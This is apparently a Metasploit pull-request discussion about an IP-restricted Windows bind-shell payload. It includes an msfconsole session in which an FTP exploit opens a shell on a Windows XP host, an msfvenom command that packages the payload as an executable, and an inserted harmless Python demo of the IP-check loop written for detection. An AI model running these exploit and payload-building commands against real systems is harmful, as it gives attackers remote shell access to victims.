Single TCP bind shell with ACL support (only the IP you set will get the shell). It's just an alternative to the classic bind shell. I think it could be useful if you do not want someone else to steal your shell with a simple netcat. I used the shell_bind_tcp of Stephen Fewer and I modified the accept() call to check the client IP (this is an increase of 22 bytes). If the IP is not the one defined in AHOST (Allowed IP) the descriptor is closed and the socket waits for another connection.
I added .asm files, the payload and the respective handler (I used the bind shell handler with a couple of modifications). Let me know other changes needed.
added ACL Bind Shell payload
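For anyone reviewing or monitoring this behaviour, the accept/compare/close loop described above can be reproduced with a harmless listener. This is an added example, not code from the pull request: the function names, the banner that stands in for the service, and the constructed addresses are assumptions. It shows that the check runs after accept(), so a non-allowed peer still completes the TCP connection and then sees an immediate close.

```python
import socket
import threading

def acl_accept_loop(srv, allowed_ip, banner=b"session\n"):
    """Serve only allowed_ip; any other peer is accepted, closed, and forgotten."""
    while True:
        conn, (peer_ip, _port) = srv.accept()  # three-way handshake is already done
        if peer_ip != allowed_ip:
            conn.close()                       # descriptor closed, back to accept()
            continue
        with conn:
            conn.sendall(banner)               # harmless stand-in for the service
        return peer_ip

def start_listener(allowed_ip):
    """Bind an ephemeral loopback port and run the accept loop in a daemon thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    threading.Thread(target=acl_accept_loop, args=(srv, allowed_ip), daemon=True).start()
    return srv.getsockname()[1]

def observe(port):
    """Return (connected, data) as seen by a client connecting from 127.0.0.1."""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=2) as c:
            try:
                return True, c.recv(64)
            except ConnectionResetError:
                return True, b""
    except OSError:
        return False, b""

if __name__ == "__main__":
    # Constructed addresses: 127.0.0.1 is the test client, 192.0.2.10 is TEST-NET-1.
    print("allowed peer :", observe(start_listener("127.0.0.1")))
    print("other peer   :", observe(start_listener("192.0.2.10")))
```

The port therefore still shows as open to a connect scan, and a listener that accepts every peer but closes all except one source address at once is the pattern to look for in connection logs.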
This looks cool! Do you happen to have sample output/demo usage?
@OJ Thank you.
You only have to use AHOST to specify the IP allowed to get the shell (others will be rejected). E.g.:
```
msf> use exploit/windows/ftp/pcman_stor
msf exploit(pcman_stor) > set rhost 192.168.1.39
rhost => 192.168.1.39
msf exploit(pcman_stor) > set payload windows/shell_acl_bind_tcp
payload => windows/shell_acl_bind_tcp
msf exploit(pcman_stor) > set lport 5041
lport => 5041
msf exploit(pcman_stor) > ifconfig | grep 192
[*] exec: ifconfig | grep 192
inet addr:192.168.1.33 Bcast:192.168.1.255 Mask:255.255.255.0
msf exploit(pcman_stor) > set ahost 192.168.1.33
ahost => 192.168.1.33
msf exploit(pcman_stor) > exploit
[*] Connecting to FTP server 192.168.1.39:21...
[*] Started ACL bind handler
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password firstname.lastname@example.org...
[*] Sending password...
[*] Trying victim Windows XP SP3 English...
[*] Command shell session 1 opened (192.168.1.33:59686 -> 192.168.1.39:5041) at 2014-02-12 04:49:35 +0100
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Test\My Documents\Downloads>
```
Example with msfvenom:
```
./msfvenom -p windows/shell_acl_bind_tcp AHOST=10.0.0.100 LPORT=1009 -f exe > batman.exe
```
In this case, only 10.0.0.100 will get the shell.
Edit by OJ: Added code format tags
I am sad that @BorjaMerino didn't make a cool video with awesome music this time. Perhaps next time. :P
@wvu-r7 xDD Who said that? Stay tuned
I love your YouTube videos! :D
Since the single (#3017) and stager (#3394) bind shell approach is an improved version of this shellcode, feel free to refuse this pull request.
Closing in favour of #3017 then